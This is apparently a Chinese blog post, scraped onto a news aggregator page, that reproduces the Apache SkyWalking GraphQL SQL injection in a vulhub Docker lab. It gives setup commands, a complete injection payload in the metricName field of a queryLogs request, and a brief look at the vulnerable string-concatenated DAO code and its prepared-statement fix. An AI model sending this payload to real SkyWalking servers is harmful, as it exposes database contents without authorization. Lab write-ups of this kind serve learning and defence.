当前位置: 首页 > news >正文

网站开发 会员模块百度做免费推广的步骤

网站开发 会员模块,百度做免费推广的步骤,营销微信管理,网站支付页面设计漏洞概述 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参…

漏洞概述

当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。

环境搭建

拉取vulhub

git clone https://github.com/vulhub/vulhub.git

搭建镜像

cd /vulhub/skywalking/8.3.0-sqli
docker-compose up -d

在这里插入图片描述
访问8080端口
在这里插入图片描述

漏洞复现

在首页刷新即可抓到报文。
在这里插入图片描述

输入payload

{"query":"query queryLogs($condition: LogQueryCondition) {queryLogs(condition: $condition) {totallogs {serviceIdserviceNameisErrorcontent}}
}
","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --","endpointId":"1","traceId":"1","state":"ALL","stateCode":"1","paging":{"pageSize":10}}}
}

查看返回结果
在这里插入图片描述
在这里插入图片描述

漏洞复现成功

漏洞原理

源码:https://github.com/apache/skywalking/releases/tag/v8.3.0
graphql是skywalking的一种查询协议,如果请求以下列JSON给出:

{bookById(id: "book-1"){idnamepageCountauthor {firstNamelastName}}
}

则返回结果为:

{"bookById": {"id":"book-1","name":"Harry Potter and the Philosopher's Stone","pageCount":223,"author": {"firstName":"Joanne","lastName":"Rowling"}}
}

通常,graphql中会对对象类型进行定义:

type Query {bookById(id: ID): Book
}type Book {id: IDname: StringpageCount: Intauthor: Author
}type Author {id: IDfirstName: StringlastName: String
}

此次产生漏洞的queryLogs为:
oap-server\server-query-plugin\query-graphql-plugin\src\main\resources\query-protocol\log.graphqls:
(这里不知道为什么下载的源码中没有,只能跑到github上看)
在这里插入图片描述

oap-server\server-query-plugin\query-graphql-plugin\src\main\java\org\apache\skywalking\oap\query\graphql\resolver\LogQuery.java
在这里插入图片描述

oap-server\server-storage-plugin\storage-jdbc-hikaricp-plugin\src\main\java\org\apache\skywalking\oap\server\storage\plugin\jdbc\h2\dao\H2LogQueryDAO.java
在这里插入图片描述

采取了直接拼接的方式。

5、修复方法
修复后使用了占位符,即预编译。

http://www.15wanjia.com/news/17547.html

相关文章:

  • vip视频解析网站建设百度关键词屏蔽
  • 网站建设7个基本流程seo推广优化外包价格
  • cms 动态网站开发网络推广与网络营销的区别
  • 浙江省杭州市软装设计公司黑帽seo优化推广
  • 北京的网站建设收费标准seo在中国
  • 北京做网站价格韩国最新新闻
  • 浙江品牌网站建设合肥百度推广优化
  • 南开网站建设优化seo域名注册服务商
  • 如果做网站用java百度一下你就知道下载安装
  • 三星做号网站西安刚刚宣布
  • 微信公众号人工客服安徽百度seo教程
  • 怎么让别人访问自己做的网站seo的重要性
  • xp系统中做网站服务器百度问问我要提问
  • 宣城做w网站的公司自媒体平台注册
  • 营销型企业网站开发网站优化排名公司
  • dede怎么做商城网站网络营销的10个特点
  • oa和erp系统区别淘宝关键词优化技巧教程
  • 湖北网站建设哪家有百度搜索竞价推广
  • 吴江区经济开发区规建设局网站海曙seo关键词优化方案
  • 秦皇岛做网站优化价格武汉大学人民医院官网
  • 网站页面设计有哪些灰色关键词排名代发
  • 石家庄网站建设培训班百度热议怎么上首页
  • 电子商务网站包括中国搜索引擎排行榜
  • 做渲染的网站网络营销的核心是
  • 二级学院网站建设及利用情况免费加客源
  • 国外wordpress模板东营优化路网
  • 分布式网站开发网络营销ppt
  • 做网站用哪种语言网络营销渠道的功能
  • 郑州网站制作电话中国搜索网站排名
  • 全国加盟网站建设seo优化标题 关键词